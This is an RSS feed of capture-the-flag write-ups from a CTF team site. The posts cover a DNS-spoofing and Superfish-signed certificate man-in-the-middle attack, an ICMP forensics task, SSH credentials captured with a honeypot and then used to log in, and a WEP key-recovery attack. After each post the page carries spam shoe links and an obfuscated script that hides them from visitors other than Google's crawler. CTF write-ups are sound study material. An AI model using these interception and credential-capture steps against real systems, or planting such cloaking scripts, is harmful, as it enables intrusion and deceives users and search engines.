</pre><p>Stop please...</p><p>We received DNS query for russian leading search engine hostname?</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_meme_what.jpg" alt="" width="600" height="374"></p><p>That is really suprisingly and a little bit unbeliviable, because CTF is hosted by BostonKeyParty team from USA, but that is true. Looks like time for some <em>DNS Spoofing</em> have come:</p><p>Honestly, <em>yandex.ru</em> is not the only hostname queried from task's service (52.0.164.37). Then it queries for <em>my.bank</em> domain.</p><p>After spoofing <em>yandex.ru</em> address we tried to listen 80 port on our server but did not receive any traffic. After solving the challenge we have known from task author that we should receive HTTP-request at 80 port, but honestly we did not receive this.</p><p>One of the ways to go further is to setup <em>dnsmasq</em> service:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/tmp# dnsmasq --no-daemon --log-queries
dnsmasq: started, version 2.62 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 209.244.0.3#53
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 8 addresses
dnsmasq: query[A] yandex.ru from 52.0.164.37
dnsmasq: forwarded yandex.ru to 8.8.4.4
dnsmasq: forwarded yandex.ru to 8.8.8.8
dnsmasq: forwarded yandex.ru to 209.244.0.3
dnsmasq: reply yandex.ru is 213.180.204.11
dnsmasq: reply yandex.ru is 93.158.134.11
dnsmasq: reply yandex.ru is 213.180.193.11
dnsmasq: query[A] yandex.ru from 52.0.164.37
dnsmasq: cached yandex.ru is 213.180.193.11
dnsmasq: cached yandex.ru is 93.158.134.11
dnsmasq: cached yandex.ru is 213.180.204.11
dnsmasq: query[A] my.bank from 52.0.164.37
dnsmasq: /etc/hosts my.bank is 188.166.48.175</pre><p>Dump all traffic after set up of <em>dnsmasq</em> and then try to find incoming connection:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_tcpdump_https.PNG" alt="" width="1200" height="447"></p><p>It is coming to port 443... Okay. Let's process it, hope the final is close!</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/tmp# nc -lvvv -p 443
listening on [any] 443 ...
connect to [188.166.48.175] from ec2-52-0-164-37.compute-1.amazonaws.com [52.0.164.37] 50092
?&lt;ؠ&lt;??5?_? ?,?E?y?]?^`g'i\??0?,?(?$??
??kj98???2?.?*?&amp;???=5???
?/?+?'?#?? ??g@32??ED?1?-?)?%???&lt;/?A???
??m
42
^C sent 0, rcvd 289</pre><p>Looks like SSL Client Hello packet. Come on! This task costs just a 300 points!</p><p>Looks like we have to set up HTTPS server, let's do this. I'm sure there are many scripts and light-weight servers for such task, but I had nginx installed and decided to process HTTPS with it.</p><p>Create self-signed certificate:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/etc/nginx# openssl genrsa -out my.bank.key 2048
Generating RSA private key, 2048 bit long modulus
............................................................................+++
............+++
e is 65537 (0x10001)
root@evildns:/etc/nginx# openssl req -new -sha1 -key my.bank.key -out my.bank.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:my.bank
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
root@evildns:/etc/nginx# openssl x509 -req -days 365 -in my.bank.csr -signkey my.bank.key -out my.bank.crt
Signature ok
subject=/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd/CN=my.bank
Getting Private key</pre><p>and set up nginx for HTTPS with that cert:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">server {
listen 443 ssl;
ssl_certificate my.bank.crt;
ssl_certificate_key my.bank.key;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl on;
ssl_session_timeout 5m;
ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv3:+EXP;
ssl_prefer_server_ciphers on;
root /data/www;
location = / {
index index.html;
}
location / {
default_type "text/html";
try_files $uri $uri.html;
}
}</pre><p>Let's look into traffic again. Hope there should be the flag now!</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/etc/nginx# tail -f /var/log/nginx/access.log
&lt;...&gt;
52.0.164.37 - - [28/Feb/2015:16:43:02 +0400] "-" 400 0 "-" "-"</pre><p>Come on! Where is the flag? We have already even set up HTTPS, WTF?</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_unknown_ca.PNG" alt=""></p><p>Unknown CA? Of course it is unknown! Where should we get trusted CA who would sign certificate for <em>my.bank</em> domain?</p><p>Our <em>my.bank</em> certificate is self-signed without any CA. Later we tried to create root CA self-signed certificate and sign <em>my.bank</em> cert with root CA's one. It did not help.</p><p>As we have known from task's author after solving the task, HTTP request to <em>yandex.ru</em> contained hint about this stage. But as I wrote above about <em>yandex.ru</em>&nbsp;we did not receive any incoimng connection at 80 port when spoofed <em>yandex.ru</em> domain.</p><p>However if you follow the news about Information Security you should hear about leaked <em>Superfish Inc. </em>certificate (and corresponding pre-installed backdoors in lenovo laptops). More info from <a href="http://blog.erratasec.com/2015/02/extracting-superfish-certificate.html">Errata Security blog</a>, for example.</p><p>&nbsp;Let's try to sign our <em>my.bank</em> certificate by&nbsp;<em>Superfich Inc</em>:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/etc/nginx# openssl x509 -req -days 365 -in my.bank.csr -CAkey super.pem -CA super.crt -out supermy.bank.crt
Signature ok
subject=/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd/CN=my.bank
Getting CA Private Key
Enter pass phrase for super.pem:</pre><p>dnd listen for incoming requests again:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/etc/nginx# tail -f /var/log/nginx/access.log
&lt;...&gt;
52.0.164.37 - - [28/Feb/2015:13:44:53 +0000] "GET /login/username=FLG-SIK9KSRBHIYUKNGEBXlKW3B7HS2I HTTP/1.1" 404 168 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0"</pre><p>I'm happy to say that username from request is the flag!</p><p>Flag:&nbsp;<strong>FLG-SIK9KSRBHIYUKNGEBXlKW3B7HS2I</strong></p><p>&nbsp;</p><p><strong>Afterwords</strong></p><p>This task is awesome. My teammates and I enjoyed it too much when fully understood how to solve it.</p><p>Task and its author are&nbsp;praiseworthy for all these interesting hacking steps which must be done to solve tasks. But not only for that. This is amazing example of how dangerous information technologies are nowadays for general users. Even for all users, I think.</p><p>Thank you BostonKeyParty and respect for such challenge!&nbsp;</p><p>Overview of task from its author:&nbsp;<a href="http://mweissbacher.com/blog/2015/03/01/boston-key-party-2015-kendall-challenge-superfish/">http://mweissbacher.com/blog/2015/03/01/boston-key-party-2015-kendall-challenge-superfish/</a></p><p>Flag:&nbsp;<strong>FLG-SIK9KSRBHIYUKNGEBXlKW3B7HS2I</strong></p><span class="keys_words"><a class="links_good_rands" href="https://www.juzsports.com/">Asics shoes</a> | <a class="links_good_rands" href="https://www.ietp.com/fr/dfediqshop/release-dates/nike/air-force-1-shadow/">Women's Nike nike roshe heart and sole shoes for women Shadow trainers - Latest Releases , Ietp</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div><div class="field field-name-field-file field-type-file field-label-above"><div class="field-label">Attachments:&nbsp;</div><div class="field-items"><div class="field-item even"><span class="file"><img class="file-icon" alt="Binary Data" title="application/octet-stream" src="/modules/file/icons/application-octet-stream.png" /> <a href="https://ctfcrew.org/sites/default/files/writeups/kendall.tar_.gz" type="application/octet-stream; length=5103">kendall.tar_.gz</a></span></div></div></div></description>
<pubDate>Mon, 02 Mar 2015 11:00:58 +0000</pubDate>
<dc:creator>Dor1s</dc:creator>
<guid isPermaLink="false">97 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/97#comments</comments>
</item>
<item>
<title>cloudfs forensics(200)</title>
<link>https://ctfcrew.org/writeup/96</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/forensics">forensics</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/31">Ghost in the Shellcode CTF Quals 2015</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>We have just finished Ghost in the Shell code CTF in 12th place. Though GITS CTF is usually one of the best CTFs, but this year they weren't that good. The web task had a good idea but wan't correctly implemented, some people got the flag right away from others' exploitations.&nbsp;Forensics tasks wasn't really PURE forensic. Yet, I personally enjoyed the CTF and enjoyed cloudfs challenge.&nbsp;</p><p>Cloudfs challenge was a forensic&nbsp;challenge with 200 points. The task description was "find the key". After downloading the task file, we&nbsp;checked the file and it was compressed with xz. After decompressing the file, we got a pcap file. Opening the PCAP file with wireshark, we found around 3K packets. Checking the Protocol&nbsp;Hierarchy of the packets we got the following result: 98.81% of the&nbsp;packets are ICMP packets.</p><p><img src="/sites/default/files/writeups/images/Screen%20Shot%202015-01-21%20at%202.38.03%20PM.png" alt="" width="1200" height="782"></p><p>It simply means that the flag must be some ICMP packets. To start solving this challenge, we need to understand what ICMP packets are. The Internet Control Message Protocol is part of the Internet Protocol Suite, as defined in RFC 792. ICMP messages are typically used for diagnostic or control purposes or generated in response to errors in IP operations (as specified in RFC 1122). ICMP protocol has many&nbsp;functionalities like sending error messages, such as&nbsp;Destination unreachable, Time limit Exceeded,&nbsp;etc... One of the ICMP protocol functionalities is ICMP echo request/reply. In the normal ICMP echo packet, the sender usually sends 48 bytes of data to the&nbsp;recipient who should echo back this data. Usually this type of ICMP packets are used to as&nbsp;an indication that the&nbsp;recipient is up and running. In the normal ICMP echo request/reply, the data section should include&nbsp;some of these bytes "11:12:13:14:15:16:17:18:19:1a:1b:1c:1d:1e:1f:20:21:22:23:24:25:26:27:28:29:2a:2b:2c:2d:2e:2f:30:31:32:33:34:35:36:37" and usually the default size of the ICMP echo request is 48 bytes.&nbsp;</p><p><img src="/sites/default/files/writeups/images/Screen%20Shot%202015-01-21%20at%202.54.40%20PM.png" alt="" width="1200" height="414"></p><p>By looking at the ICMP packets in the given pcap file. we realized that the size of each packet is NOT 48 bytes. We also noticed that the packets do not contain the normal data that is sent in usual ICMP echo request packets. We decided that we should dump all these packets (the unique ones) then we de-hex them and try to understand what they might mean. We dumped all data of the ICMP packets using tshark with the following options.&nbsp;</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ tshark -r cloudfs -Y "icmp" -T fields -e data &gt; raw_data</pre><p>Now we have the raw_data of the ICMP echo packets. We need to do 2 things: first remove all duplicates, and then de-hex the data. This can be done with a very simple python script. The following script does what I have explained above.</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag" title="Python">f = open('raw_data', 'r')
lines = f.read().splitlines()
output = []
output2=[]
for l in lines:
try:
val = l.decode('hex')
if val not in output:
output.append(val)
except:
print "In Exception" + l
w = open('output_raw_decoded', 'wb')
for i in output:
w.write(i)
w.close()</pre><p>Now we have the unique data dumped into a file and decoded. The next stage we should think of is to try to understand this data. What is this file. I checked the output_raw_decoded with the file command but it just show its type as "data". I then decided to run binwalk to see if there are any data within this group of binary. Indeed, binwalk show us the following result.&nbsp;</p><p><img src="/sites/default/files/writeups/images/Screen%20Shot%202015-01-21%20at%203.05.57%20PM.png" alt="" width="777" height="130"></p><p>We can see s bzip2 compressed file here. We dumped the compressed file using dd with the following options</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ dd if=output_raw_decoded of=compressed_output skip=1480 bs=1</pre><p>Now we have another file which we should check its type and see what is inside. However, I simply tried to cat the file directly before even checking its type and I got this.&nbsp;</p><p><img src="/sites/default/files/writeups/images/Screen%20Shot%202015-01-21%20at%203.11.21%20PM.png" alt="" width="1200" height="462"></p><p>We can see the key now ...</p><p><strong>key{WhyWouldYouEverUseThis}</strong></p><p>I hope you enjoyed the write-up</p><p>Regards</p><span class="keys_words"><a class="links_good_rands" href="https://www.juzsports.com/">Asics shoes</a> | <a class="links_good_rands" href="https://www.ietp.com/fr/dfecfyshop/products/yeezy-slides-core-g55492">Buy Yeezy Slides 'Core' - Kanye West x Adidas — Ietp</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div></description>
<pubDate>Wed, 21 Jan 2015 13:24:56 +0000</pubDate>
<dc:creator>the_storm</dc:creator>
<guid isPermaLink="false">96 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/96#comments</comments>
</item>
<item>
<title>Rick (malware 15)</title>
<link>https://ctfcrew.org/writeup/95</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/admin">admin</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/30">31C3 CTF Quals 2014</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>Task description says that "seems like somebody got pwned&nbsp;<a style="box-sizing: border-box; color: #337ab7;" href="http://188.40.18.67/">http://188.40.18.67</a>". When I went to the link I was immediately rickrolled.</p><p><!--break--></p><p>&nbsp;Ok, let's look for something at page source code. Here we can see html comment:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">&lt;!-- ERROR: Could not write logfile - attacking IP_ADDRESS:22 --&gt;</pre><p>where IP_ADDRESS was my external IP address. It's looks like page trying connect to me via SSH.</p><p>Lets look for login attempts:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ tail -f /var/log/auth.log | grep 188.40.18.67</pre><p>And after requesting this page via curl</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ curl -i http://188.40.18.67/</pre><p>we can see log:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">Dec 28 14:30:39 azrael sshd[30330]: Invalid user admin from 188.40.18.67
Dec 28 14:30:41 azrael sshd[30330]: Failed password for invalid user admin from 188.40.18.67 port 32964 ssh2
Dec 28 14:30:42 azrael sshd[30332]: Invalid user oracle from 188.40.18.67
Dec 28 14:30:44 azrael sshd[30332]: Failed password for invalid user oracle from 188.40.18.67 port 32965 ssh2
Dec 28 14:30:44 azrael sshd[30330]: Connection closed by 188.40.18.67 [preauth]
Dec 28 14:30:45 azrael sshd[30334]: Invalid user hans from 188.40.18.67
Dec 28 14:30:47 azrael sshd[30334]: Failed password for invalid user hans from 188.40.18.67 port 32966 ssh2
Dec 28 14:30:47 azrael sshd[30332]: Connection closed by 188.40.18.67 [preauth]
Dec 28 14:30:47 azrael sshd[30334]: Connection closed by 188.40.18.67 [preauth]</pre><p>We can see that some host trying to login via SSH by three different credentials (admin, oracle and hans). This behavior very close to botnet where one infected machine trying to login on another by SSH bruteforce. Maybe some of this credentials&nbsp;are suitable for the game (infected) server.</p><p>We need catch passwords of this acconts. For this purpose I ran awesome SSH honeypot <a href="https://github.com/desaster/kippo">kippo</a> on port 22. How to install and setup kippo you can read <a href="https://www.digitalocean.com/community/tutorials/how-to-install-kippo-an-ssh-honeypot-on-an-ubuntu-cloud-server">here</a> and how to setup kippo events logging read <a href="http://bruteforce.gr/logging-kippo-events-using-mysql-db.html">here</a>.</p><p>Now let's repeat curl request and look into MySQL login attempts table:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ mysql -u kippo -p</pre><pre class="brush: sql; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">&gt; USE kippo;
&gt; SELECT * from auth; </pre><p>&nbsp;And this is result:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag"> +----+----------------------------------+---------+----------+----------------------+---------------------+
| id | session | success | username | password | timestamp |
+----+----------------------------------+---------+----------+----------------------+---------------------+
| 1 | 686aaff48edc11e4901c04012f2f8f01 | 0 | admin | admin | 2014-12-28 21:56:42 |
| 2 | 696d26708edc11e4901c04012f2f8f01 | 0 | oracle | oracle123 | 2014-12-28 21:56:44 |
| 3 | 6a7f8cc48edc11e4901c04012f2f8f01 | 0 | hans | =l@Zy+&amp;'}M_.]&lt;zEcDN9 | 2014-12-28 21:56:46 |
+----+----------------------------------+---------+----------+----------------------+---------------------+ </pre><p>So we got three pairs (login, password). "admin" and "oracle" passwords quite typical but "hans" password looks very interesting. Let's try it:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ ssh [email protected]
[email protected]'s password:
Last login: Tue Dec 28 13:55:47 2014 from &lt;some_ip_here&gt;</pre><p>Ok, we on server and now we can get flag:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">hans@31c3ctf-rick:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Dec 28 00:09 .
drwxr-xr-x 4 root root 4096 Dec 27 20:48 ..
-rw-r--r-- 1 root root 38 Dec 28 00:09 flag.txt
hans@31c3ctf-rick:~$ cat flag.txt
31c3_a5bb3ead8fbc6617374ea3f57f0563d2</pre><p>Flag is&nbsp;<strong>31c3_a5bb3ead8fbc6617374ea3f57f0563d2</strong>.</p><span class="keys_words"><a class="links_good_rands" href="https://www.mysneakers.org/">Nike air jordan Sneakers</a> | <a class="links_good_rands" href="https://www.fitforhealth.eu/cdafshop/online/air-jordan-1-low-white-black-midnight-navy-for-sale/">Air Jordan 1 Low White/Black-Midnight Navy For Sale – Fitforhealth</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div></description>
<pubDate>Mon, 29 Dec 2014 21:16:53 +0000</pubDate>
<dc:creator>azrael</dc:creator>
<guid isPermaLink="false">95 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/95#comments</comments>
</item>
<item>
<title>This week for our team</title>
<link>https://ctfcrew.org/blog/94</link>
<description><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p class="p1"><span class="s1">This weekend we are going to take part in three on-site final challenges.</span></p><p class="p2">&nbsp;</p><p class="p1"><span class="s1">First one is <strong>D-CTF 2014 Final</strong> at DefCamp Conference (http://defcamp.ro/) on information security, Bucharest, Romania.</span>&nbsp;</p><p class="p1"><span class="s1">The second is <strong>CSCAMP CTF 2014 Final</strong> held at Cairo, Egypt (http://www.cairosecuritycamp.com/).</span></p><p class="p1"><span class="s1">And third one is <strong>PRO-IB</strong> competition - it is Russian national contest on information security business-cases for students (http://www.pro-ib.org/). So our youngest members will be there. They qualified for final with first place in preliminary rating.</span></p><p class="p2"><span class="s1"><img src="/sites/default/files/writeups/images/bc_selfie_bucharest_2014.jpg" alt="" width="1200" height="900"></span></p><p class="p1"><span class="s1">Hope it is not bad idea to deal so widely - three finals at one time. It will be hard. But anyway we got qualified for all three events not for missing such possibilities.</span></p><p class="p2">&nbsp;</p><p class="p1"><span class="s1">Big thanks to our sponsor <a href="http://university.innopolis.ru/">Innopolis University</a> for supporting our trip to CSCAMP CTF 2014 Final.&nbsp;</span></p><p class="p2">&nbsp;</p><p class="p1"><span class="s1">Hope we will win some money and cover expenses for other trips :)</span></p><p class="p1"><span class="s1">One more thing... This week our team celebrates 2-years birthday. Sure that</span></p><p class="p1"><span class="s1"><img src="/sites/default/files/writeups/images/this_journey_is_1%25_finished.jpg" alt="" width="1024" height="768"></span></p><p>&nbsp;</p><p class="p1"><span class="s1">Happy hacking!</span></p><span class="keys_words"><a class="links_good_rands" href="https://www.copperbridgemedia.com/">Running sports</a> | <a class="links_good_rands" href="http://www.adefra.com/index.php/acfbajgshop/nike/?showAllProducts=true">Nike Shoes, Sneakers & Accessories</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div></description>
<pubDate>Thu, 27 Nov 2014 21:57:48 +0000</pubDate>
<dc:creator>Dor1s</dc:creator>
<guid isPermaLink="false">94 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/blog/94#comments</comments>
</item>
<item>
<title>Collect as much as you can (Crypto 300)</title>
<link>https://ctfcrew.org/writeup/93</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/crypto">crypto</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/29">CSCAMP CTF Quals 2014</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>The description contains ip address and port to connect to and hint: IVs.</p><p>When we connect to given ip and port we can find that the server gives us result of encryption and 3 numbers that incrementing sequentially:</p><pre class="brush: plain; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">123
Server response: 5a6bea4f:18:31:33
1234
Server response: 1a6fda664e:18:33:115
12345
Server response: ca236e16faad:18:35:215</pre><p>It's obvious that some stream cipher was used for encryption. The last 3 numbers seems to be 3 bytes, which are parts of IV. So IV is of size 24 bit.</p><p>Googling of "24 bit IV" give us a reference to wiki page: <a href="http://en.wikipedia.org/wiki/Initialization_vector#WEP_IV">http://en.wikipedia.org/wiki/Initialization_vector#WEP_IV</a>. Because there in WEP widely known stream cipher RC4 is used, it seems to be a right way.</p><p>So we have to crack WEP. Suppose that encryption key is the flag.</p><p>After little more googling&nbsp; we've found a scientific research: <a href="http://eprint.iacr.org/2007/120.pdf">http://eprint.iacr.org/2007/120.pdf</a>. For this attack we should have a lot of pairs (IV, streamGamma). Fortunately it can be easily automated via python and data of size ~58 Mb with ~290000 pairs has been collected.</p><p>Because we did not find implementation of this attack (even something like PoC) which takes data in an obvious format, we've decided to implement this attack by ourselves. The title of article is "Breaking 104 bit WEP in less than 60 seconds" that means, that attack is farst enought and can be coded using `not fast language` like python. That was the way we go.</p><p>During attack realization only formula (5) from article and first 2 paragraphs of the section 6 needed.</p><p>After coding, when we run our realization on collected data first time we've found that computed votes have distribution, closed to normal one with the center, close to 0... but we've noticed that there are local spikes, which get us close to ASCII string key.</p><p><span style="text-decoration: underline;">ROUND 1</span></p><p>In such way by manual search of such spikes we've found a key "<strong>RC4isNOTbadWEP</strong>", but we can't pass this result as flag...&nbsp;The reason was simplification of the task from orgs: they fixed 8 bits in 24 bit IV (it have no influence for selected attack) and changed key length to smaller one:</p><p>&nbsp;</p><blockquote><p>01:07 (Dor1s) hi</p><p>01:07 (Dor1s) we solved crypto300</p><p>01:07 (Dor1s) but site is not loading</p><p>01:07 (Dor1s) how we can submit it?</p><p>01:10 __nu11___: what is your key?</p><p>01:10 (Dor1s) RC4isNOTbadWEP</p><p>01:11 